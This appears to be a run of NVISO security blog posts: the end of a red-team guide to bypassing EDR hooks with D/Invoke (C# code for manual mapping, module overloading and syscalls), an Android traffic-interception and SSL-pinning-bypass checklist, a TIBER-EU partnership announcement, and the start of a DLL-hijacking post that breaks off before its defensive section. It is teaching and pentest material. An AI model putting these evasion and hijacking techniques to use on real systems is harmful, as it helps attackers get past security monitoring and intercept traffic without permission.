The PoC can be found here:
https://github.com/NVISO-BE/DInvisibleRegistry

Usage of the PoC – DInvisibleRegistry



There are three methods of invocation coded into the PoC; all of them are fully implemented, even though they could have been merged into one big function.
The reason I took the time to write the code out in full is that I wanted to show the concepts behind the different approaches an operator can take to leverage D/Invoke to bypass hooking.

Method 1: “classic” dynamic invoke.

When specifying the -n flag and all other required parameters the PoC will create a new (hidden, if you use the -h flag) registry key in the requested hive using the traditional D/Invoke methodology.
This method will bypass IAT hooking as the functions are being called dynamically, thus not showing up in the IAT.

D/Invoke works like this: you first need to create the signature of the API call you are trying to make (unless it is already in the D/Invoke NuGet) and the corresponding delegate function:

API signature

public static DInvoke.Data.Native.NTSTATUS NtOpenKey(
    ref IntPtr keyHandle,
    STRUCTS.ACCESS_MASK desiredAccess,
    ref STRUCTS.OBJECT_ATTRIBUTES objectAttributes)
{
    object[] funcargs =
    {
        keyHandle, desiredAccess, objectAttributes
    };
    DInvoke.Data.Native.NTSTATUS retvalue = (DInvoke.Data.Native.NTSTATUS)DInvoke.DynamicInvoke.Generic.DynamicAPIInvoke(@"ntdll.dll", @"NtOpenKey", typeof(DELEGATES.NtOpenKey), ref funcargs);
    keyHandle = (IntPtr)funcargs[0];
    return retvalue;
}

Corresponding delegate:

[UnmanagedFunctionPointer(CallingConvention.StdCall)]
public delegate DInvoke.Data.Native.NTSTATUS NtOpenKey(
    ref IntPtr keyHandle,
    STRUCTS.ACCESS_MASK desiredAccess,
    ref STRUCTS.OBJECT_ATTRIBUTES objectAttributes);

As you can see in the API signature, you are calling the DynamicAPIInvoke function and passing it the delegate of the function.

Method 2: “Manual Mapping”

A trick some threat actors and malware strains use is the concept of manual mapping. TheWover explains manual mapping in his blog post as follows:

DInvoke supports manual mapping of PE modules, stored either on disk or in memory. This capability can be used either for bypassing API hooking or simply to load and execute payloads from memory without touching disk. The module may either be mapped into dynamically allocated memory or into memory backed by an arbitrary file on disk. When a module is manually mapped from disk, a fresh copy of it is used. That way, any hooks that AV/EDR would normally place within it will not be present. If the manually mapped module makes calls into other modules that are hooked, then AV/EDR may still trigger. But at least all calls into the manually mapped module itself will not be caught in any hooks. This is why malware often manually maps ntdll.dll. They use a fresh copy to bypass any hooks placed within the original copy of ntdll.dll loaded into the process when it was created, and force themselves to only use Nt* API calls located within that fresh copy of ntdll.dll. Since the Nt* API calls in ntdll.dll are merely wrappers for syscalls, any call into them will not inadvertently jump into other modules that may have hooks in place

Manual mapping is done in the PoC when you specify the -m flag and the code looks like this

First, map the library you are using; the lower you go, the smaller the chance of hooks further down the call tree. Whenever you can, use ntdll.dll.

DInvoke.Data.PE.PE_MANUAL_MAP mappedDLL = new DInvoke.Data.PE.PE_MANUAL_MAP();
mappedDLL = DInvoke.ManualMap.Map.MapModuleToMemory(@"C:\Windows\System32\ntdll.dll");

Next, create the delegate for the function you are trying to call, if it is not yet in D/Invoke; otherwise you can just leverage the NuGet.

[UnmanagedFunctionPointer(CallingConvention.StdCall)]
public delegate DInvoke.Data.Native.NTSTATUS NtOpenKey(
    ref IntPtr keyHandle,
    STRUCTS.ACCESS_MASK desiredAccess,
    ref STRUCTS.OBJECT_ATTRIBUTES objectAttributes);

Next, create your function parameters and an array to store them in

IntPtr keyHandle = IntPtr.Zero;
STRUCTS.ACCESS_MASK desiredAccess = STRUCTS.ACCESS_MASK.KEY_ALL_ACCESS;
STRUCTS.OBJECT_ATTRIBUTES oa = new STRUCTS.OBJECT_ATTRIBUTES();
oa.Length = Marshal.SizeOf(oa);             
oa.Attributes = (uint)STRUCTS.OBJ_ATTRIBUTES.CASE_INSENSITIVE;             
oa.objectName = oaObjectName;             
oa.SecurityDescriptor = IntPtr.Zero;           
oa.SecurityQualityOfService = IntPtr.Zero;            
DInvoke.Data.Native.NTSTATUS retValue = new DInvoke.Data.Native.NTSTATUS();
object[] ntOpenKeyParams =
{
    keyHandle,desiredAccess,oa
};

Finally, call D/invokes CallMappedDLLModuleExport to call the function from the manually mapped DLL.

retValue = (DInvoke.Data.Native.NTSTATUS)DInvoke.DynamicInvoke.Generic.CallMappedDLLModuleExport(mappedDLL.PEINFO, mappedDLL.ModuleBase, "NtOpenKey", typeof(DELEGATES.NtOpenKey), ntOpenKeyParams, false);

In the case of ntdll, the last parameter of CallMappedDLLModuleExport is false; this is because ntdll does not have a DllMain method. Setting it to true would make the call try to access memory that does not exist, crashing the program.


Method 3: OverloadMapping (my personal favorite)

TheWover explains Module Overloading as follows:

In addition to normal manual mapping, we also added support for Module Overloading. Module Overloading allows you to store a payload in memory (in a byte array) into memory backed by a legitimate file on disk. That way, when you execute code from it, the code will appear to execute from a legitimate, validly signed DLL on disk.
A word of caution: manual mapping is complex and we do not guarantee that our implementation covers every edge case. The version we have implemented now is serviceable for many common use cases and will be improved upon over time. Additionally, manual mapping and syscall stub generation do not currently work in WOW64 processes.

Methods 2 and 3 are largely the same in implementation; the only variation is that you call the overload manual map method and no longer have to map the module to memory yourself:

        DInvoke.Data.PE.PE_MANUAL_MAP mappedDLL = DInvoke.ManualMap.Overload.OverloadModule(@"C:\Windows\System32\ntdll.dll");

The rest of the implementation remains the same as in method 2.

If you want to see which decoy module got used, you can retrieve it through the DecoyModule property of the PE_MANUAL_MAP structure:

Console.WriteLine("Decoy module is found!\n Using: {0} as a decoy", mappedDLL.DecoyModule);

Method 4: System calls

Disclaimer: This method is currently a bit “broken”; as a result, you might not get the result you are looking for. This is also the reason why this method is currently NOT implemented in the PoC. I would advise not using this method until a later release of D/Invoke.

D/Invoke has provided an API to dynamically get system calls as well. The steps to generate system calls are explained next.

Create your delegate (should it not already exist):

[UnmanagedFunctionPointer(CallingConvention.StdCall)]
public delegate DInvoke.Data.Native.NTSTATUS NtOpenKey(
    ref IntPtr keyHandle,
    STRUCTS.ACCESS_MASK desiredAccess,
    ref STRUCTS.OBJECT_ATTRIBUTES objectAttributes);

Create an IntPtr to store your syscall stub pointer and fill it in using the GetSyscallStub function:

IntPtr syscall = IntPtr.Zero;
syscall  = DInvoke.DynamicInvoke.Generic.GetSyscallStub("NtOpenKey");

Create a delegate for the call you want to make that uses the syscall stub, through the use of our dear friend Marshal:

DELEGATES.NtOpenKey syscallNtOpenKey = (DELEGATES.NtOpenKey)Marshal.GetDelegateForFunctionPointer(syscall, typeof(DELEGATES.NtOpenKey));

Finally, make the call 🙂

retValue = syscallNtOpenKey(ref keyHandle, desiredAccess, ref oa);

Conclusion

I hope this blogpost has shed some light on the different approaches an operator could take in order to bypass EDR hooks for both IAT and inline hooking.
Feel free to contribute to the D/Invoke project by submitting a pull request! We will greatly appreciate your efforts! The D/Invoke GitHub project can be found here:
https://github.com/TheWover/DInvoke
The proof of concept can be found here:
https://github.com/NVISO-BE/DInvisibleRegistry

About the author

Jean-François Maes is a red teaming and social engineering expert working in the NVISO Cyber Resilience team. 
When he is not working, you can probably find Jean-François in the Gym or conducting research.
Apart from his work with NVISO, he is also the creator of redteamer.tips, a website dedicated to help red teamers.
Jean-François is currently also in the process of becoming a SANS instructor for the SANS SEC699: Purple Team Tactics – Adversary Emulation for Breach Prevention & Detection course
He was also ranked #1 on the Belgian leaderboard of Hack The Box (a popular penetration testing platform).
You can find Jean-François on LinkedIn , Twitter , GitHub and on Hack The Box.

Proxying Android app traffic – Common issues / checklist

19 November 2020 at 09:52

During a mobile assessment, there will typically be two sub-assessments: The mobile frontend, and the backend API. In order to examine the security of the API, you will either need extensive documentation such as Swagger or Postman files, or you can let the mobile application generate all the traffic for you and simply intercept and modify traffic through a proxy (MitM attack).

Sometimes it’s really easy to get your proxy set up. Other times, it can be very difficult and time consuming. During many engagements, I have found myself going over this ‘sanity checklist’ to figure out which step went wrong, so I wanted to write it down and share it with everyone.

In this guide, I will use PortSwigger’s Burp Suite proxy, but the same steps can of course be used with any HTTP proxy. The proxy will be hosted at 192.168.1.100 on port 8080 in all the examples. The checks start very basic, but ramp up towards the end.

TL;DR;

Update: Sven Schleier also created a blogpost on this with some awesome visuals and graphs, so check that out as well!

Setting up the device

First, we need to make sure everything is set up correctly on the device. These steps apply regardless of the application you’re trying to MitM.

Is your proxy configured on the device?

An obvious first step is to configure a proxy on the device. The UI changes a bit depending on your Android version, but it shouldn’t be too hard to find.

Sanity check
Go to Settings > Connections > Wi-Fi, select the Wi-Fi network that you’re on, click Advanced > Proxy > Manual and enter your Proxy details:

Proxy host name: 192.168.1.100
Proxy port: 8080

Is Burp listening on all interfaces?

By default, Burp only listens on the local interface (127.0.0.1) but since we want to connect from a different device, Burp needs to listen on the specific interface that has joined the Wi-Fi network. You can either listen on all interfaces, or listen on a specific interface if you know which one you want. As a sanity check, I usually go for ‘listen on all interfaces’. Note that Burp has an API which may allow other people on the same Wi-Fi network to query your proxy and retrieve information from it.

Sanity check
Navigate to http://192.168.1.100:8080 on your host computer. The Burp welcome screen should come up.

Solution
In Burp, go to Proxy > Options > Click your proxy in the Proxy Listeners window > check ‘All interfaces’ on the Bind to Address configuration

Can your device connect to your proxy?

Some networks have host/client isolation and won’t allow clients to talk to each other. In this case, your device won’t be able to connect to the proxy since the router doesn’t allow it.

Sanity Check
Open a browser on the device and navigate to http://192.168.1.100:8080 . You should see Burp’s welcome screen. You should also be able to navigate to http://burp in case you’ve already configured the proxy in the previous check.

Solution
There are a few options here:

  • Set up a custom wireless network where host/client isolation is disabled
  • Host your proxy on a device that is accessible, for example an AWS ec2 instance
  • Perform an ARP spoofing attack to trick the mobile device into believing you are the router
  • Use adb reverse to proxy your traffic over a USB cable:
    • Configure the proxy on your device to go to 127.0.0.1 on port 8080
    • Connect your device over USB and make sure that adb devices shows your device
    • Execute adb reverse tcp:8080 tcp:8080 which sends all traffic received on <device>:8080 to <host>:8080
    • At this point, you should be able to browse to http://127.0.0.1:8080 and see Burp’s welcome screen

Can you proxy HTTP traffic?

The steps for HTTP traffic are typically much easier than HTTPS traffic, so a quick sanity check here makes sure that your proxy is set up correctly and reachable by the device.

Sanity check
Navigate to http://neverssl.com and make sure you see the request in Burp. Neverssl.com is a website that doesn’t use HSTS and will never send you to an HTTPS version, making it a perfect test for plaintext traffic.

Solution

  • Go over the previous checks again, something may be wrong
  • Check whether Burp’s Intercept is enabled and the request is waiting for your approval

Is your Burp certificate installed on the device?

In order to intercept HTTPS traffic, your proxy’s certificate needs to be installed on the device.

Sanity check
Go to Settings > Security > Trusted credentials > User and make sure your certificate is listed. Alternatively, you can try intercepting HTTPS traffic from the device’s browser.

Solution
This is documented in many places, but here’s a quick rundown:

  • Navigate to http://burp in your browser
  • Click the ‘CA Certificate’ in the top right; a download will start
  • Use adb or a file manager to change the extension from der to crt
    • adb shell mv /sdcard/Download/cacert.der /sdcard/Download/cacert.crt
  • Navigate to the file using your file manager and open the file to start the installation

Is your Burp certificate installed as a root certificate?

Applications on more recent versions of Android don’t trust user certificates by default. A more thorough writeup is available in another blog post. Alternatively, you can repackage applications to add the relevant controls to the network_security_config.xml file, but having your root CA in the system CA store will save you a headache on other steps (such as third-party frameworks), so it’s my preferred method.

Sanity check
Go to Settings > Security > Trusted credentials > System and make sure your certificate is listed.

Solution
In order to get your certificate listed as a root certificate, your device needs to be rooted with Magisk

  • Install the client certificate as normal (see previous check)
  • Install the MagiskTrustUser module
  • Restart your device to enable the module
  • Restart a second time to trigger the file copy

Alternatively, you can:

  • Make sure the certificate is in the correct format and copy/paste it to the /system/etc/security/cacerts directory yourself. However, for this to work, your /system partition needs to be writable. Some rooting methods allow this, but it’s very dirty and Magisk is just so much nicer. It’s also a bit tedious to get the certificate in the correct format.
  • Modify the networkSecurityConfig to include user certificates as trust anchors (a minimal example is shown right after this list, and the same file comes up again in the SSL pinning section below). It’s much nicer to have your certificate as a system certificate though, so I rarely take this approach.
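
As a rough sketch of that last option, a network security configuration that also trusts user-installed CAs could look as follows. The file is typically stored as res/xml/network_security_config.xml and referenced from the application element in AndroidManifest.xml via android:networkSecurityConfig, but the exact resource name may differ per app:

<?xml version="1.0" encoding="utf-8"?>
<network-security-config>
    <base-config>
        <trust-anchors>
            <!-- Keep trusting the pre-installed system CAs -->
            <certificates src="system" />
            <!-- Additionally trust CAs installed by the user, such as your Burp certificate -->
            <certificates src="user" />
        </trust-anchors>
    </base-config>
</network-security-config>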

Does your Burp certificate have an appropriate lifetime?

Google (and thus Android) is aggressively shortening the maximum accepted lifetime of leaf certificates. If your leaf certificate’s expiration date is too far ahead in the future, Android/Chrome will not accept it. More information can be found in this blogpost.

Sanity check
Connect to your proxy using a browser and investigate the certificate lifetime of both the root CA and the leaf certificate. If they’re shorter than 1 year, you’re good to go. If they’re longer, I like to play it safe and create a new CA. You can also use the latest version of the Chrome browser on Android to validate your certificate lifetime. If something’s wrong, Chrome will display the following error: ERR_CERT_VALIDITY_TOO_LONG

Solution
There are two possible solutions here:

  • Make sure you have the latest version of Burp installed, which reduces the lifetime of generated leaf certificates
  • Make your own root CA that’s only valid for 365 days (example commands below). Certificates generated by this root CA will also be shorter than 365 days. This is my preferred option, since the certificate can be shared with team members and be installed on all devices used during engagements.
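
For the second option, something along the following lines should work (a sketch; adjust the subject, key size and file names to your liking). Depending on your OpenSSL version and configuration, you may need to explicitly add CA basic constraints (for example with -addext "basicConstraints=critical,CA:TRUE"):

# Generate a CA private key and a self-signed CA certificate valid for 365 days
openssl req -x509 -newkey rsa:2048 -sha256 -days 365 -nodes \
    -keyout pentest-ca.key -out pentest-ca.pem -subj "/CN=Pentest CA"

# Bundle the certificate and key into a PKCS#12 file that Burp can import
openssl pkcs12 -export -in pentest-ca.pem -inkey pentest-ca.key -out pentest-ca.p12

The resulting PKCS#12 file can then be imported into Burp via Proxy > Options > Import / export CA certificate, after which Burp will sign its per-host certificates with this short-lived CA.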

Setting up the application

Now that the device is ready to go, it’s time to take a look at application specifics.

Is the application proxy aware?

Many applications simply ignore the proxy settings of the system. Applications that use standard libraries will typically use the system proxy settings, but applications that rely on interpreted language (such as Xamarin and Unity) or are compiled natively (such as Flutter) usually require the developer to explicitly program proxy support into the application.

Sanity check
When running the application, you should either see your HTTPS data in Burp’s Proxy tab, or you should see HTTPS connection errors in Burp’s Event log on the Dashboard panel. Since the entire device is proxied, you will see many blocked requests from applications that use SSL Pinning (e.g. Google Play), so see if you can find a domain that is related to the application. If you don’t see any relevant failed connections, your application is most likely proxy unaware.

As an additional sanity check, you can see if the application uses a third party framework. If the app is written in Flutter it will definitely be proxy unaware, while if it’s written in Xamarin or Unity, there’s a good chance it will ignore the system’s proxy settings.

  • Decompile with apktool
    • apktool d myapp.apk
  • Go through known locations
    • Flutter: myapp/lib/arm64-v8a/libflutter.so
    • Xamarin: myapp/unknown/assemblies/Mono.Android.dll
    • Unity: myapp/lib/arm64-v8a/libunity.so

Solution
There are a few things to try:

  • Use ProxyDroid (root only). Although it’s an old app, it still works really well. ProxyDroid uses iptables in order to forcefully redirect traffic to your proxy
  • Set up a custom hotspot through a second wireless interface and use iptables to redirect traffic yourself. You can find the setup on the mitmproxy documentation, which is another useful HTTP proxy. The exact same setup works with Burp.

In both cases, you have moved from a ‘proxy aware’ to a ‘transparent proxy’ setup. There are two things you must do:

  • Disable the proxy on your device. If you don’t do this, Burp will receive both proxied and transparent requests, which are not compatible with each other.
  • Configure Burp to support transparent proxying via Proxy > Options > active proxy > edit > Request Handling > Support invisible proxying

Perform the sanity check again to now hopefully see SSL errors in Burp’s event log.

Is the application using custom ports?

This only really applies if your application is not proxy aware. In that case, you (or ProxyDroid) will be using iptables to intercept traffic, but these iptables rules only target specific ports. In the ProxyDroid source code, you can see that only ports 80 (HTTP) and 443 (HTTPS) are targeted. If the application uses a non-standard port (for example 8443 or 8080), it won’t be intercepted.

Sanity check
This one is a bit trickier. We need to find traffic leaving the application that isn’t going to ports 80 or 443. The best way to do this is to listen for all traffic leaving the application. We can do this using tcpdump on the device, or on the host machine in case you are working with a second Wi-Fi hotspot.

Run the following command on an adb shell with root privileges:

tcpdump -i wlan0 -n -s0 -v

You will see many different connections. Ideally, you should start the command, open the app and stop tcpdump as soon as you know the application has made some requests. After some time, you will see connections to a remote host with a non-default port. In the example below, there are multiple connections to 192.168.2.70 on port 8088:

Alternatively, you can write the output of tcpdump to a pcap file by using tcpdump -i wlan0 -n -s0 -w /sdcard/output.pcap. After retrieving the output.pcap file from the device, it can be opened and inspected with Wireshark:
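
If you prefer the command line over Wireshark's GUI, a tshark one-liner along these lines (a sketch; extend the port list with whatever you consider standard for the app) lists the destination host and port of every new connection that does not go to 80 or 443:

tshark -r output.pcap -Y "tcp.flags.syn == 1 && tcp.flags.ack == 0 && !(tcp.dstport in {80 443})" -T fields -e ip.dst -e tcp.dstport | sort -u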

Solution

If your application is indeed proxy unaware and communicating over custom ports, ProxyDroid won’t be able to help you. ProxyDroid doesn’t allow you to add custom ports, though it is an open-source project and a PR for this would be great 😉. This means you’ll have to use iptables manually.

  • Either you set up a second hotspot where your host machine acts as the router, and you can thus perform a MitM
  • Or you use ARP spoofing to perform an active MitM between the router and the device
  • Or you can use iptables yourself and forward all the traffic to Burp. Since Burp is listening on a separate host, the nicest solution is to use adb reverse to map a port on the device to your Burp instance. This way you don’t need to set up a separate hotspot, you just need to connect your device over USB.
    • On host: adb reverse tcp:8080 tcp:8080
    • On device, as root: iptables -t nat -A OUTPUT -p tcp -m tcp --dport 8088 -j REDIRECT --to-ports 8080

Is the application using SSL pinning?

At this point, you should be getting HTTPS connection failures in Burp’s Event log on the Dashboard. The next step is to verify if SSL pinning is used, and to disable it. Although many Frida scripts claim to be universal SSL pinning bypasses, there isn’t a single one that even comes close. Android applications can be written in many different technologies, and only a few of those technologies are typically supported. Below you can find various ways in which SSL pinning may be implemented, and ways to get around it.

Note that some applications have multiple ways to pin a specific domain, and you may have to combine scripts in order to disable all of the SSL pinning.

Pinning through android:networkSecurityConfig

Android allows applications to perform SSL pinning by using the network_security_config.xml file. This file is referenced in the AndroidManifest.xml and is located in res/xml/. The name is usually network_security_config.xml, but it doesn’t have to be. As an example application, the Microsoft Authenticator app has the following two pins defined:
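
To give an idea of what such a configuration looks like, below is a generic, purely illustrative pin-set; the domain and digest are placeholders and not the actual Authenticator values:

<network-security-config>
    <domain-config>
        <domain includeSubdomains="true">example.com</domain>
        <pin-set expiration="2022-01-01">
            <pin digest="SHA-256">7HIpactkIAq2Y49orFOOQKurWxmmSFZhBCoQYcRhJ3Y=</pin>
        </pin-set>
    </domain-config>
</network-security-config>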

Solution
Use any of the normal universal bypass scripts:

  • Run Objection and execute the android sslpinning disable command
  • Use Frida codeshare: frida -U --codeshare akabe1/frida-multiple-unpinning -f be.nviso.app
  • Remove the networkSecurityConfig attribute from the AndroidManifest by decompiling and rebuilding with apktool d and apktool b. It’s usually much faster to do it through Frida, so this approach is only rarely needed.

Pinning through OkHttp

Another popular way of pinning domains is through the OkHttp library. You can do a quick validation by grepping for OkHttp and/or sha256. You will most likely find references (or even hashes) relating to OkHttp and whatever is being pinned:
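
After decompiling with apktool, a quick grep along these lines (paths are illustrative) usually shows whether OkHttp's CertificatePinner is present and which hosts or hashes are pinned:

grep -ri "certificatepinner" myapp/ | head
grep -ri "sha256/" myapp/ | head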

Solution
Use any of the normal universal bypass scripts:

  • Run Objection and execute the android sslpinning disable command
  • Use Frida codeshare: frida -U --codeshare akabe1/frida-multiple-unpinning -f be.nviso.app
  • Decompile the apk using apktool, and modify the pinned domains. By default, OkHttp will allow connections that are not specifically pinned. So if you can find and modify the domain name that is pinned, the pinning will be disabled. Using Frida is much faster though, so this approach is rarely taken.

Pinning through OkHttp in obfuscated apps

Universal pinning scripts may still work on obfuscated applications, since they hook Android framework classes, which can’t be obfuscated. However, if an application uses something other than a default Android library, the classes will be obfuscated and the scripts will fail to find them. A good example of this is OkHttp. When an application uses OkHttp and has been obfuscated, you’ll have to figure out the obfuscated name of the CertificatePinner.Builder class. You can see below that obfuscated OkHttp was used by searching for the same sha256 string. This time, you won’t see nice OkHttp class references, but you will typically still find string references and maybe some package names as well. This depends on the level of obfuscation, of course.

Solution
You’ll have to write your own Frida script to hook the obfuscated version of the CertificatePinner.Builder class. I have written down the steps to easily find the correct method, and create a custom Frida script in this blogpost.

Pinning through various libraries

Instead of using the networkSecurityConfig or OkHttp, developers can also perform SSL pinning using many different standard Java classes or imported libraries. Additionally, some Java-based third-party frameworks, such as PhoneGap or Appcelerator, provide specific functions that let the developer add pinning to the application.

There are many ways to implement pinning programmatically, so your best bet is to try various anti-pinning scripts and at least figure out which methods are being triggered. That gives you information about the app, after which you may be able to reverse engineer it further and figure out why interception isn’t working yet.

Solution
Try as many SSL pinning bypass scripts as you can find, and monitor their output. If you can identify certain classes or frameworks that are used, this will help you create your own custom SSL pinning bypass specific to the application.

Pinning in third party app frameworks

Third party app frameworks will have their own low-level implementation for TLS and HTTP and default pinning bypass scripts won’t work. If the app is written in Flutter, Xamarin or Unity, you’ll need to do some manual reverse engineering.

Figuring out if a third party app framework is used
As mentioned in a previous step, the following files are giveaways for either Flutter, Xamarin or Unity:

  • Flutter: myapp/lib/arm64-v8a/libflutter.so
  • Xamarin: myapp/unknown/assemblies/Mono.Android.dll
  • Unity: myapp/lib/arm64-v8a/libunity.so

Pinning in Flutter applications

Flutter is proxy-unaware and doesn’t use the system’s CA store. Every Flutter app contains a full copy of trusted CAs which is used to validate connections. So while it most likely isn’t performing SSL pinning, it still won’t trust the root CAs on your device and thus interception will not be possible. More information is available in the blogposts mentioned below.

Solution
Follow my blog post for either ARMv7 or ARM64 (x64)

Pinning in Xamarin and Unity applications

Xamarin/Unity applications usually aren’t too difficult, but they do require manual reverse engineering and patching. Xamarin/Unity applications contain .dll files in the assemblies/ folder and these can be opened using .NET decompilers. My favorite tool is dnSpy, which also allows you to modify the dll files.

Solution
No blog post on this yet, sorry 😉. The steps are as follows:

  • Extract apk using apktool and locate .dll files
  • Open .dll files using DNSpy and locate HTTP pinning logic
  • Modify logic either by modifying the C# code or the IL
  • Save the modified module
  • Overwrite the .dll file with the modified version
  • Repackage and resign the application (see the sketch after this list)
  • Reinstall the application and run
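
As a rough sketch of the last steps (file and keystore names are illustrative, and keytool will prompt you interactively for a password and identity):

apktool b myapp/ -o myapp-patched.apk
zipalign -p 4 myapp-patched.apk myapp-aligned.apk
keytool -genkeypair -keystore test.keystore -alias test -keyalg RSA -keysize 2048 -validity 10000
apksigner sign --ks test.keystore --ks-key-alias test myapp-aligned.apk
adb install -r myapp-aligned.apk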

What if you still can’t intercept traffic?

It’s definitely possible that after all of these steps, you still won’t be able to intercept all the traffic. The typical culprits:

  • Non-HTTP protocols (we’re only using an HTTP proxy, so non-HTTP protocols won’t be intercepted)
  • Very heavy obfuscation
  • Anti-tampering controls

You will usually see these features in either mobile games or financial applications. At this point, you’ll have to reverse engineer the application and write your own Frida scripts. This can be an incredibly difficult and time consuming process, and a step-by-step guide such as this will never be able to help you there. But that, of course, is where the fun begins 😎.

About the author



Jeroen Beckers is a mobile security expert working in the NVISO Cyber Resilience team. He is a SANS instructor and SANS lead author of the SEC575 course. Jeroen is also a co-author of OWASP Mobile Security Testing Guide (MSTG) and the OWASP Mobile Application Security Verification Standard (MASVS). He loves to both program and reverse engineer stuff. You can find Jeroen on LinkedIn.

NVISO and QuoIntelligence Announce Strategic Cooperation

30 October 2020 at 10:51

We are pleased to announce that we have created a unique joint approach with QuoIntelligence GmbH to TIBER-EU testing. Using this approach, we combine passive threat intelligence gathering and active offensive red team testing into one seamless experience, while both providers remain independent from each other.  

The TIBER-EU Framework, More Critical Now Than Ever 

The constant evolution of the cyber threat landscape, combined with the recent acceleration of the financial sector’s digital transformation driven by new global challenges such as the COVID-19 pandemic, brings new and complex cyber threats using more advanced methods and techniques. Financial institutions can better face these evolving threats and aim to reach a more secure digital environment by putting in place the right cyber and operational resilience strategies early on. 

In order to test and improve the cyber resilience of financial institutions, the European Central Bank developed a framework for ‘Threat Intelligence Based Ethical Red Teaming’, commonly known as TIBER-EU framework, to carry out a controlled cyberattack based on real-life threat scenarios. TIBER-EU exercises are designed for entities which are part of the core financial infrastructure at the national or European level.

“It is the first EU-wide guide on how authorities, entities, threat intelligence and red-team providers should work together to test and improve the cyber resilience of entities by carrying out a controlled cyberattack.”  – Fiona van Echelpoel, Deputy Director General at ECB 

By conducting a TIBER-EU test, institutions can enhance their cyber and operational resilience by focusing on the strengths and weaknesses of their technology, monitoring and human awareness before they are exploited by real-life threat actors. The exercise’s main objective is to test and improve protection, detection, and response capabilities against sophisticated cyber threats. By implementing TIBER-EU testing, European organizations will be able to reduce the impact of potential cyberattacks.

Source: Lessons Learned and Evolving Practices of the TIBER Framework

Benefits for European Organizations 

Since the TIBER-EU testing process can be quite overwhelming for the testing entities, selecting the right qualified providers is the first step towards a successful experience and a resourceful outcome. Smooth integration and communication between the Threat Intelligence and Red Teaming providers is crucial to implement optimal strategies tailored to the testing entity’s cyber strengths and weaknesses. 

For this reason, we at NVISO are cooperating with QuoIntelligence GmbH, a German Threat Intelligence provider supporting decision-makers with customized and actionable intelligence reports, to facilitate the cyber resilience testing process. Within this approach, QuoIntelligence first looks at the range of possible threats, selects the most applicable threat actors likely to target the entity, and creates a customized Targeted Threat Intelligence Report which lays the foundation for the Red Team’s attack scenarios. Then, NVISO, as the Red Teaming provider, carries out the simulated attack and attempts to compromise the critical functions of the entity by mimicking one of the real-life threat actors in scope.

In cooperation with QuoIntelligence, we have already implemented effective joint processes and offer a seamless experience between the Threat Intelligence and Red Teaming providers. Organizations can then take the worry out of the process and let themselves be guided by experienced providers. 

Conclusion

Cybersecurity risks are becoming harder to assess and interpret due to the growing complexity of the threat landscape, adversarial ecosystem, and expansion of the attack surface.

“The expansion of knowledge and expertise in cybersecurity is crucial to improve preparedness and resilience. The EU should continue building capacity through the investment in cybersecurity training programs, professional certification, exercises and awareness campaigns.”  – ENISA Threat Landscape Report 2020 

In order to test and improve the cyber resilience of the European financial sector, the European Central Bank has put in place the TIBER-EU framework involving a close collaboration between a Threat Intelligence provider and a Red Teaming provider.

QuoIntelligence and NVISO are now offering a strategic approach to simplify the TIBER-EU testing process and offer a worry-free experience to European organizations that want to take their cyber and operational resilience to the next level.

Authors and contact

In case of questions and for more information, please contact [email protected].

This article was written by Marina Hirschberger, Senior Security Consultant, together with Jonas Bauters, Solution Lead for Red Teaming at NVISO, and in cooperation with Iris Fernandez, Marketing Expert at QuoIntelligence GmbH.

MITRE ATT&CK turned purple – Part 1: Hijack execution flow

6 October 2020 at 10:42
By: NVISO

The MITRE ATT&CK framework is probably the most well-known framework in terms of adversary emulation and by extent, red teaming.
It features numerous TTPs (Tactics, Techniques, and Procedures) and maps them to threat actors. Being familiar with this framework benefits not only red team operations but blue team operations as well! To create the most secure environment for your enterprise, it is imperative that you know what threat actors are using and how to defend against it.

Having 100% coverage of MITRE ATT&CK is probably not feasible; by choosing the TTPs that are most relevant for your environment, however, you can start setting up baseline defenses and expand from there. This will help you mature your enterprise’s security posture significantly. We at NVISO use the framework in our daily operations and have therefore decided it was time to combine the knowledge we have in-house from both our blue and red teams to provide insight into how these techniques can be leveraged from an offensive point of view AND how to prevent (or at least detect) the technique from a defensive point of view. In our first blogpost of the series, we decided to cover T1574 – Hijack execution flow.

Offensive point of view: Leveraging execution flow hijacking in red team engagements and threat emulations

Execution flow hijacking usually boils down to the following: identifying a binary present on the system that is missing dependencies (typically a DLL) and providing said missing dependency. Luckily for us, the good people at Microsoft have gifted us with a tool suite called sysinternals, which we will happily leverage to identify missing dependencies.

It should be noted that casually dropping sysinternals tools on a target environment is very poor operational security and probably won’t do you much good anyway. For most of the tooling (if not all), you will need administrative privileges on the machine you are running it from. Therefore it is much more interesting to either have some “educated” knowledge beforehand on what software is present in your target environment, or (simpler) to hijack a program you know will most likely be installed. Some fine examples of this would be Teams, Chrome, Firefox, …

We can identify missing dependencies using a tool created by our friends over at SpecterOps called “DLLHijackTest”. This tool needs an export from sysinternals’ Process Monitor and will attempt to verify if the processes identified are indeed hijackable, as not all missing DLLs are loaded in the same way (with DLLMain being called) at execution time.

Let’s identify some nice missing dependencies on our trusted Internet Explorer using the following Process Monitor filter:
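
The screenshot of the filter is not reproduced here, but a typical Process Monitor filter for this kind of hunt (shown as an illustration, not necessarily the exact one used) consists of entries such as:

Process Name   is          iexplore.exe     Include
Result         is          NAME NOT FOUND   Include
Path           ends with   .dll             Include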

After this filter is applied, let’s open Internet Explorer and check our process monitor light up like a Christmas tree:

Now we can export this as a CSV file by going to File -> Save and choosing CSV as the output format.

All we need now is a valid hijack, which we can test using the aforementioned PowerShell script from SpecterOps:

Get-PotentialDLLHijack -CSVPath "G:\testzone\DLLHijackTest-master\InternetExplorer\IE.CSV" -MaliciousDLLPath "G:\testzone\DLLHijackTest-master\x64\Release\DLLHijackTest.dll" -ProcessPath "C:\Program Files\Internet Explorer\iexplore.exe"

What happens now is the following chain of steps:

  • A DLL gets dropped in the location of the application and is named after a missing dependency
  • The process gets launched
  • If the DLLMain method is called, the DLL will write its own path to an output location that you need to set in the source code of the SpecterOps project.
  • The process terminates

This repeats until the entire CSV is parsed. If the application has a vulnerable Hijack, an output file will be created at the location you hardcoded.

In the case of Internet Explorer this is indeed the case:

We have successfully fuzzed Internet Explorer and identified four missing DLLs that are in fact loaded and their DLLMain is executed.

Note: for this blogpost, IE was chosen as a PoC. You will need admin rights to write to C:\Program Files\, so for red team ops this is a pretty weak candidate, unless you abuse it for persistence.

Now all that is left to do is create a DLL that executes your payload, name it one of the missing dependencies identified in the results file and drop it on disk.
Every time Internet Explorer will be opened, your DLL payload will fire.

Defensive point of view: Preventing and detecting execution flow Hijacks

When looking through the public Sigma repository, it is noticeable that only a few rules to detect this technique exist:
